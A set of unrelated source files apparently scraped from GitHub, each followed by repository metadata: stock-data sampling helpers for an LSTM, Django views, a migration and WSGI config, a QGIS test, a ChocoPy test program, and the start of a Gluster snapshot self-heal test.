# The function below takes in a stock dataframe and a number between r 0 and 1. It returns a random list
# of time_id-groups so that the total arrows of the groups do not exceed r*(size of the dataframe). The time_id groups
# are represented as (first row of group, last row fo group)
def file_sample(frame, percentage):
    """Draw whole time_id groups of *frame* at random (with replacement,
    weighted by group size) until roughly percentage * n rows are covered.

    Returns the drawn (time_id, first_row, last_row) tuples; the candidate
    that pushes the running total past the budget is discarded.
    """
    import random
    total = frame.shape[0]
    budget = percentage * total
    chosen = []
    candidate = local_patch(frame, random.randrange(total))
    covered = candidate[2] - candidate[1] + 1
    while covered <= budget:
        chosen.append(candidate)
        candidate = local_patch(frame, random.randrange(total))
        covered = covered + candidate[2] - candidate[1] + 1
    return chosen
# The function below takes in a stock dataframe a list of time_id-groups of that dataframe (groups represented as in
# the function above) and a real number r. It splits the list of time_id groups according to the real number and then
# concatenates the data frames corresponding to it's part returning two dataframes.
def patches_to_frame(frame, patches, train_size):
    """Split *patches* ((time_id, first_row, last_row) tuples) into a train part
    (the first floor(len * train_size) patches) and a test part, then
    concatenate the matching row slices of *frame* for each part.
    Returns [train_frame, test_frame].
    """
    import math
    import pandas as pd
    cut = math.floor(len(patches) * train_size)
    halves = (patches[:cut], patches[cut:])
    concatenated = []
    for group in halves:
        pieces = [frame[start:end + 1] for (_tid, start, end) in group]
        concatenated.append(pd.concat(pieces))
    return [concatenated[0], concatenated[1]]
# The function below take a list of pats of stock files a real number p and a real number t. It randomly chooses time_id
# groups from each file corresponding approximately to r*100 percentage of total rows in the files, also it splits
# the list of groups according to t keeping a list of training groups and a list of test groups. Finally it concatenates
# all the groups from all the files returning two data frames corresponding to a training dataframe and a test
# dataframe.
def global_random_sample(file_names, percentage, train_size):
    """For every stock file, sample ~percentage of its rows by whole time_id
    groups, split those groups into train/test by *train_size*, tag all rows
    with a 'stock_id' column and concatenate across files.
    Returns [train_frame, test_frame].
    """
    import pandas as pd
    train_parts = []
    test_parts = []
    for path in file_names:
        sid = stock_id(path)
        stock_frame = parquet_frame(path)
        sampled_patches = file_sample(stock_frame, percentage)
        split = patches_to_frame(stock_frame, sampled_patches, train_size)
        for part, bucket in ((split[0], train_parts), (split[1], test_parts)):
            part['stock_id'] = [sid] * part.shape[0]
            bucket.append(part)
    return [pd.concat(train_parts), pd.concat(test_parts)]
# The following function returns a 3D as required for the keras LSTM model. We pad each time_id group with 0s
# so that the size of all groups is equal to 'groupsize'. The 'first' and 'last arguments corresponding to the first
# and last column of 'frame' that will be used as values for the LSTM model.
def lstm_input(frame, groupsize, first, last):
    """Build the 3D (num_groups, groupsize, last-first) array for a keras LSTM.

    Each time_id group of *frame* (columns first:last) is zero-padded at the
    front up to *groupsize* rows.  Rewritten to collect groups in a list and
    np.stack once: the original np.append-per-group was O(n^2) and crashed
    with a concatenate shape mismatch whenever a group already had exactly
    *groupsize* rows (empty python-list pad).  Raises ValueError if a group
    has more than *groupsize* rows.
    """
    import numpy as np
    n = frame.shape[0]
    width = last - first
    groups = []
    previous = 0
    for i in range(n - 1):
        # A change in time_id between consecutive rows closes the current group.
        if not frame.loc[i].at["time_id"] == frame.loc[i + 1].at["time_id"]:
            block = frame.iloc[previous:i + 1, first:last].to_numpy()
            pad = np.zeros((groupsize - (i + 1 - previous), width))
            groups.append(np.concatenate((pad, block), axis=0))
            previous = i + 1
    # Final (or only) group runs to the end of the frame.
    block = frame.iloc[previous:n, first:last].to_numpy()
    pad = np.zeros((groupsize - (n - previous), width))
    groups.append(np.concatenate((pad, block), axis=0))
    return np.stack(groups, axis=0)
# The following function takes a dataframe that is a concatenation of stock dataframes and returns a subframe containing
# all rows corresponding to stock_id = sid. It is required that the initial frame has a stock_id column.
def stock_subframe(frame, sid):
    """Return the rows of ``frame`` whose ``stock_id`` column equals ``sid``.

    Assumes the matching rows are contiguous and that ``frame`` carries the
    default 0..n-1 RangeIndex: the positional hits are reused as ``.loc``
    labels (inclusive on both ends).  Raises IndexError if ``sid`` is absent.
    """
    import numpy as np
    hits = np.flatnonzero(np.asarray(frame['stock_id']) == sid)
    first = hits[0]
    return frame.loc[first: first + len(hits) - 1]
# The following function takes a dataframe of concatenated stock dataframes and returns the list of target values
# of the corresponding (stock_id,time_id) elements.
def frame_to_values(frame, values_fr):
    """Return (as a numpy array) the ``target`` entries of ``values_fr``
    whose (stock_id, time_id) pair also occurs in ``frame``.

    ``values_fr`` is expected to keep rows of the same stock_id adjacent;
    the per-stock time_id set is rebuilt whenever the stock_id changes.
    """
    import numpy as np
    targets = []
    current_sid = None
    sample_ids = set()
    for i in range(values_fr.shape[0]):
        row = values_fr.loc[i]
        sid = row.at["stock_id"]
        if i == 0 or sid != current_sid:
            # New stock: collect the time_ids this stock has in `frame`.
            current_sid = sid
            sample_ids = set(stock_subframe(frame, sid).loc[:, "time_id"])
        if row.at["time_id"] in sample_ids:
            targets.append(row.at["target"])
    return np.array(targets)
# In the following function filename1 corresponds to the path of a file that is a random sample of some book-stock_id
# file and filename2 is the path of the corresponding trade-stock_id file. It returns the random sample of filename2
# that contains the same time_id groups as filename1.
def counterpart_file(filename1, filename2):
    """Restrict the trade file ``filename2`` to the time_id groups that the
    (already sampled) book file ``filename1`` kept for the same stock.

    filename1: path of a csv random sample of some book-stock file.
    filename2: path of the corresponding trade-stock parquet file.
    Returns the rows of filename2 belonging to the sampled time_id groups.
    """
    import pandas as pd
    frame2 = parquet_frame(filename2)
    frame1 = csv_frame(filename1)
    sid = stock_id(filename2)
    # time_id groups that survived the sampling of the book file
    subframe = stock_subframe(frame1, sid)
    sample_ids = subframe.loc[:, "time_id"]
    sample_ids = set(sample_ids)
    frames = []
    previous = 0
    n = frame2.shape[0]
    # Walk frame2; at each group boundary (last row of a time_id group, or the
    # final row), copy the group out if its time_id was sampled.  `.loc` slices
    # are label based and inclusive, so this assumes a default RangeIndex.
    # NOTE(review): the slices start at previous + 1 while previous starts at
    # 0, so row 0 of frame2 is never included in the first group -- looks like
    # an off-by-one; confirm against the upstream data layout.
    for i in range(n):
        if i == n - 1:
            if frame2.loc[i].at["time_id"] in sample_ids:
                subframe = frame2.loc[previous + 1:n - 1]
                frames.append(subframe)
            previous = i
        elif not frame2.loc[i + 1].at["time_id"] == frame2.loc[i].at["time_id"]:
            if frame2.loc[i].at["time_id"] in sample_ids:
                subframe = frame2.loc[previous + 1:i]
                frames.append(subframe)
            previous = i
    result = pd.concat(frames)
    return result
# The following function takes a range of rows of a dataframe and returns a row with statistical information
# of that range of rows
def stat_contraction(frame, start, end):
    """Summarise rows ``start:end`` (end exclusive) of ``frame`` into one
    1 x k row: the time_id at row ``start`` followed, for every column after
    the first two, by (max, min, mean, population standard deviation).
    """
    import numpy as np
    import math
    row = [frame.loc[start].at["time_id"]]
    for name in frame.columns[2:]:
        col = np.array(frame[name][start:end])
        row.extend((np.max(col),
                    np.min(col),
                    np.sum(col) / len(col),
                    math.sqrt(np.var(col))))
    return np.array(row).reshape((1, len(row)))
# The following function takes a stock dataframe and returns the dataframe formed after replacing each time_id-groups
# with a row containing statistical information about it.
def contracted_frame(frame):
    """Collapse every time_id group of a book-stock ``frame`` into one row of
    summary statistics (max/min/mean/sd per price and size column), using
    ``stat_contraction``.

    NOTE(review): ``stat_contraction``'s slice is end-exclusive, so the call
    ``stat_contraction(frame, previous+1, i)`` covers rows previous+1 .. i-1
    and drops the last row of every group; the first group additionally
    starts at row 1, never row 0.  Both look like off-by-ones -- confirm
    before relying on the produced statistics.
    NOTE: the numpy and math imports below are unused here (they are used by
    stat_contraction, which imports them itself).
    """
    import numpy as np
    import pandas as pd
    import math
    # One output column per statistic of each level-1/level-2 bid/ask field.
    new_columns = ['time_id', 'bid_price1_max', 'bid_price1_min', 'bid_price1_av', 'bid_price1_sd', 'ask_price1_max',
                   'ask_price1_min', 'ask_price1_av', 'ask_price1_sd', 'bid_price2_max', 'bid_price2_min',
                   'bid_price2_av', 'bid_price2_sd', 'ask_price2_max', 'ask_price2_min', 'ask_price2_av',
                   'ask_price2_sd', 'bid_size1_max', 'bid_size1_min', 'bid_size1_av', 'bid_size1_sd', 'ask_size1_max',
                   'ask_size1_min', 'ask_size1_av', 'ask_size1_sd', 'bid_size2_max', 'bid_size2_min', 'bid_size2_av',
                   'bid_size2_sd', 'ask_size2_max', 'ask_size2_min', 'ask_size2_av', 'ask_size2_sd']
    contracted = pd.DataFrame(columns=new_columns)
    previous = 0
    n = frame.shape[0]
    for i in range(n - 1):
        # Group boundary: time_id changes between row i and row i+1.
        if not frame.loc[i].at["time_id"] == frame.loc[i + 1].at["time_id"]:
            values = stat_contraction(frame, previous+1, i)
            temp = pd.DataFrame(values, columns=new_columns)
            contracted = pd.concat([contracted, temp])
            previous = i
        # Last iteration: flush the final group (plain `if`, so at i == n-2
        # this can run in addition to the boundary branch above).
        if i+1 == n-1:
            values = stat_contraction(frame, previous+1, i+1)
            temp = pd.DataFrame(values, columns=new_columns)
            contracted = pd.concat([contracted, temp])
            previous = i
    return contracted
| [
"noreply@github.com"
] | jingmouren.noreply@github.com |
61036e432e537abc60826c8d95716e236963ba2d | 5a02333b618fa23883e3dd31829a11c6e0395a6a | /engine/views (copy).py | a56007b0d61e2ce1665afba06188bdc22f34d9e0 | [] | no_license | Trizalio/BaseProject | c3fa97f213cd4db69c2837cf88c47dedc81fa551 | 05035c89363119918f95433c8defa982de509015 | refs/heads/master | 2020-04-06T04:30:39.007815 | 2014-09-05T15:45:26 | 2014-09-05T15:45:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,265 | py | from django.shortcuts import render_to_response, get_object_or_404
from django.contrib.auth.models import User
from django.http import HttpResponseRedirect, HttpResponse
import datetime
from django.contrib.auth.forms import UserCreationForm
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.core.context_processors import csrf
#from django.contrib import auth
from django.contrib.auth import authenticate, login
def home(request, str1 = 'anonim'):
    """Render the news page; for anonymous visitors, handle the login form.

    Authenticated users get News.html immediately.  A POST attempts a login:
    success renders News.html with a success flag, a disabled account or bad
    credentials fall through to NewsExample.html with the matching flag.
    GET requests simply render NewsExample.html with a CSRF token.
    """
    context = {}

    # Already logged in: show the news page straight away.
    if request.user.is_authenticated():
        context['curusername'] = '123'  # request.user.username
        return render_to_response('News.html', context)

    if request.method == 'POST':
        user = authenticate(username=request.POST['username'],
                            password=request.POST['password'])
        if user is not None and user.is_active:
            login(request, user)
            context['curusername'] = request.user.username
            context['loginsuccess'] = True
            return render_to_response('News.html', context)
        # Failed login: flag the reason for the template.
        if user is not None:
            context['logindisabled'] = True
        else:
            context['loginfault'] = True

    # Anonymous page (GET or failed POST) needs a CSRF token for the form.
    context.update(csrf(request))
    return render_to_response('NewsExample.html', context)
def logout(request):
    """Log the current user out and redirect to the home page.

    Bug fix: the module-level ``from django.contrib import auth`` import is
    commented out, so the previous body raised NameError on every call.
    Import it locally (the module name cannot clash with this view's name).
    """
    from django.contrib import auth
    auth.logout(request)
    return HttpResponseRedirect('/')
#
#
#
#def my_view(request):
# username = request.POST['username']
# password = request.POST['password']
# user = authenticate(username=username, password=password)
# if user is not None:
# if user.is_active:
# login(request, user)
# # Redirect to a success page.
# else:
# # Return a 'disabled account' error message
# else:
# # Return an 'invalid login' error message.
| [
"gifla@ya.ru"
] | gifla@ya.ru |
5d54d6dc6544b926996fb5332cc815d1578decd3 | fca1056e9df9fbf13e92379f8f329cda27faa3ce | /DRAF/DRAF/wsgi.py | b1a3338daf964956f6d942d419a65c94e9ba48c4 | [] | no_license | SolderingKnowledge/Rest-API | 5fc1adf1fb5006e02c7e508bf7ea909bfb74159a | a5bbb47c15dda5d78c515a68fab58ff87f37dbca | refs/heads/master | 2020-03-25T17:18:24.738941 | 2019-06-20T23:54:41 | 2019-06-20T23:54:41 | 143,972,369 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for DRAF project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings before building the application;
# setdefault keeps an explicitly exported DJANGO_SETTINGS_MODULE intact.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "DRAF.settings")
# Module-level WSGI callable picked up by application servers
# (gunicorn, uWSGI, mod_wsgi, ...).
application = get_wsgi_application()
| [
"noreply@github.com"
] | SolderingKnowledge.noreply@github.com |
e9e780c6a50efbd1bc3f389464d332f7649b4dec | 7780fe9c17110df4cde526f2f32b48739b46d801 | /tests/utils_test.py | a76cee2c3223ae7873aaa13dbc4a87bed82ef738 | [] | no_license | rduivenvoorde/xytools | 59c2d38a2994a63964219a951838611bab180265 | 1a8184409efb6eb7074f38b6d4f0623e01afaed0 | refs/heads/master | 2020-12-15T02:45:50.027364 | 2016-10-02T15:55:15 | 2016-10-02T15:55:15 | 7,837,390 | 4 | 3 | null | 2016-09-25T10:11:39 | 2013-01-26T12:23:46 | Python | UTF-8 | Python | false | false | 756 | py | '''
Created on 13/12/2013
@author: victorzinho
'''
import unittest
import utils
from qgis.core import QGis
from mock import Mock
class Test(unittest.TestCase):
    """Unit test for utils.fieldNames."""

    def testGetFieldNames(self):
        """fieldNames should return the provider's field names, in order."""
        expected = ['ID', 'NAME']
        layer = Mock()
        layer.dataProvider().fields.return_value = [
            self._mockField(name) for name in expected
        ]
        assert utils.fieldNames(layer) == expected

    def _mockField(self, name):
        """Build a mock field whose name() call returns ``name``."""
        mock_field = Mock()
        mock_field.name.return_value = name
        return mock_field
# Allow running this module directly: discovers and runs the TestCase above.
if __name__ == "__main__":
    # import sys;sys.argv = ['', 'Test.testName']
    unittest.main()
| [
"victor.gonzalez@geomati.co"
] | victor.gonzalez@geomati.co |
cbe5f43ddfbfbe7b436a28d4810339b2291dcf95 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/coverage-big-1706.py | e71fa3edcf5b892e227597f755678d3066f64bc5 | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,349 | py | count:int = 0
count2:int = 0
count3:int = 0
count4:int = 0
count5:int = 0
def foo(s: str) -> int:
return len(s)
def foo2(s: str, s2: str) -> int:
return len(s)
def foo3(s: str, s2: str, s3: str) -> int:
return len(s)
def foo4(s: str, s2: str, s3: str, s4: str) -> int:
return len(s)
def foo5(s: str, s2: str, s3: str, s4: str, s5: str) -> int:
return len(s)
class bar(object):
p: bool = True
def baz(self:"bar", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar2(object):
p: bool = True
p2: bool = True
def baz(self:"bar2", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar2", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar3(object):
p: bool = True
p2: bool = True
p3: bool = True
def baz(self:"bar3", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar3", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar3", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal $ID
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar4(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
def baz(self:"bar4", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar4", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar4", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar4", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
class bar5(object):
p: bool = True
p2: bool = True
p3: bool = True
p4: bool = True
p5: bool = True
def baz(self:"bar5", xx: [int]) -> str:
global count
x:int = 0
y:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz2(self:"bar5", xx: [int], xx2: [int]) -> str:
global count
x:int = 0
x2:int = 0
y:int = 1
y2:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz3(self:"bar5", xx: [int], xx2: [int], xx3: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
y:int = 1
y2:int = 1
y3:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz4(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
def baz5(self:"bar5", xx: [int], xx2: [int], xx3: [int], xx4: [int], xx5: [int]) -> str:
global count
x:int = 0
x2:int = 0
x3:int = 0
x4:int = 0
x5:int = 0
y:int = 1
y2:int = 1
y3:int = 1
y4:int = 1
y5:int = 1
def qux(y: int) -> object:
nonlocal x
if x > y:
x = -1
def qux2(y: int, y2: int) -> object:
nonlocal x
nonlocal x2
if x > y:
x = -1
def qux3(y: int, y2: int, y3: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
if x > y:
x = -1
def qux4(y: int, y2: int, y3: int, y4: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
if x > y:
x = -1
def qux5(y: int, y2: int, y3: int, y4: int, y5: int) -> object:
nonlocal x
nonlocal x2
nonlocal x3
nonlocal x4
nonlocal x5
if x > y:
x = -1
for x in xx:
self.p = x == 2
qux(0) # Yay! ChocoPy
count = count + 1
while x <= 0:
if self.p:
xx[0] = xx[1]
self.p = not self.p
x = x + 1
elif foo("Long"[0]) == 1:
self.p = self is None
return "Nope"
print(bar().baz([1,2]))
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
0eafa771e434cc47da07d9832275df08bc7e0215 | ccd27037d13c0288aae5d94e616c659ce2a713a0 | /donor/migrations/0001_initial.py | b2964b3233b6f9785178e02fc623f4e664a5e3c9 | [] | no_license | AniketShahane/ZeroDay-01 | 99ce4dad366b778851518a07a34ab9d100246ed5 | 2a12c6965fdbc9c1f1db3d2f207861a7ddcb62e8 | refs/heads/master | 2020-04-21T11:14:03.077996 | 2019-02-11T13:21:31 | 2019-02-11T13:21:31 | 169,516,547 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,907 | py | # Generated by Django 2.1.5 on 2019-02-06 08:07
import datetime
from django.db import migrations, models
import django.db.models.deletion
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Auto-generated initial migration for the ``donor`` app: creates the
    Donor, RevenueAdded and RevenueSpent tables.

    NOTE(review): every DateTimeField below carries a *datetime instance* as
    its ``verbose_name`` -- presumably the models passed ``datetime.now()``
    (or similar) as the first positional Field argument, which Django treats
    as verbose_name.  Harmless for the schema, but the models should be fixed
    and a follow-up migration generated rather than hand-editing this file.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        # Donor: a named donor from some area, with the donated amount.
        migrations.CreateModel(
            name='Donor',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('area', models.CharField(max_length=250)),
                ('amount', models.IntegerField()),
                ('time', models.DateTimeField(verbose_name=datetime.datetime(2019, 2, 6, 8, 7, 30, 318661, tzinfo=utc))),
            ],
        ),
        # RevenueAdded: an amount credited by a donor (FK to Donor).
        migrations.CreateModel(
            name='RevenueAdded',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('principal_amount', models.IntegerField()),
                ('time', models.DateTimeField(verbose_name=datetime.datetime(2019, 2, 6, 8, 7, 30, 324627, tzinfo=utc))),
                ('donor_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='donor.Donor')),
            ],
        ),
        # RevenueSpent: an amount spent on one of a fixed set of resources.
        migrations.CreateModel(
            name='RevenueSpent',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('principal_amount', models.IntegerField()),
                ('resource', models.CharField(choices=[('SCH', 'Scholarships'), ('ST', 'Stationery'), ('ACC', 'Accommodation'), ('HC', 'Health Care')], max_length=255)),
                ('time', models.DateTimeField(verbose_name=datetime.datetime(2019, 2, 6, 8, 7, 30, 325058, tzinfo=utc))),
            ],
        ),
    ]
| [
"shahaneaniket11@gmail.com"
] | shahaneaniket11@gmail.com |
467e02fac1ee0a2d0adf38f1a86fe51efd1d8f05 | 49e09da220cbfa3304b79dc2c3ae59dbc3b0f50c | /tests/functional/snapshot/test_snap_self_heal.py | 10f8a531a8ce6edf00ef90f299ea932e2a6714fb | [] | no_license | hellohaihai/glusto-tests | 8e9ef796b5d95cd30dd619606ca07101f91bc8af | c04c4a6507df415f1a337c79e357f26fa93e5308 | refs/heads/master | 2020-05-26T07:11:19.615145 | 2019-05-10T07:33:52 | 2019-05-10T07:33:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,417 | py | # Copyright (C) 2017-2018 Red Hat, Inc. <http://www.redhat.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
Description:
Test Cases in this module tests the
Creation of clone from snapshot of volume.
"""
from glusto.core import Glusto as g
from glustolibs.gluster.exceptions import ExecutionError
from glustolibs.gluster.gluster_base_class import GlusterBaseClass, runs_on
from glustolibs.gluster.mount_ops import (mount_volume, umount_volume,
is_mounted)
from glustolibs.gluster.volume_ops import volume_start
from glustolibs.gluster.brick_libs import (
get_all_bricks, are_bricks_online, bring_bricks_offline,
select_bricks_to_bring_offline,
get_offline_bricks_list, get_online_bricks_list, bring_bricks_online)
from glustolibs.gluster.heal_libs import monitor_heal_completion
from glustolibs.gluster.volume_libs import (
cleanup_volume,
get_subvols,
verify_all_process_of_volume_are_online,
wait_for_volume_process_to_be_online)
from glustolibs.gluster.snap_ops import (snap_create,
snap_list,
snap_activate,
snap_clone)
from glustolibs.misc.misc_libs import upload_scripts
@runs_on([['distributed-replicated'],
          ['glusterfs']])
class SnapshotSelfheal(GlusterBaseClass):
    """Verify self-heal on a volume cloned from a snapshot: clone the
    snapshot, run I/O, cycle some bricks offline/online and check that all
    bricks of each subvolume end up with equal arequal checksums.

    NOTE(review): written for Python 2 (``im_func``, list-returning
    ``filter``); it will need porting before running under Python 3.
    """
    @classmethod
    def setUpClass(cls):
        # Fixed names shared by the test: snapshot, clone volume and the
        # mount point used for the clone.
        GlusterBaseClass.setUpClass.im_func(cls)
        cls.snap = "snap1"
        cls.clone = "clone1"
        cls.mount1 = "/mnt/clone1"
    def setUp(self):
        # Upload the file_dir_ops I/O script to the client used by the test.
        g.log.info("Upload io scripts to clients %s for running IO on "
                   "mounts", self.clients[0])
        script_local_path = ("/usr/share/glustolibs/io/scripts/"
                            "file_dir_ops.py")
        self.script_upload_path = ("/usr/share/glustolibs/io/scripts/"
                                   "file_dir_ops.py")
        ret = upload_scripts(self.clients[0], script_local_path)
        if not ret:
            raise ExecutionError("Failed to upload IO scripts to clients %s" %
                                 self.clients[0])
        g.log.info("Successfully uploaded IO scripts to clients %s",
                   self.clients[0])
        # Setting up the volume and mounting it
        GlusterBaseClass.setUp.im_func(self)
        g.log.info("Starting to SetUp Volume")
        ret = self.setup_volume_and_mount_volume(mounts=self.mounts)
        if not ret:
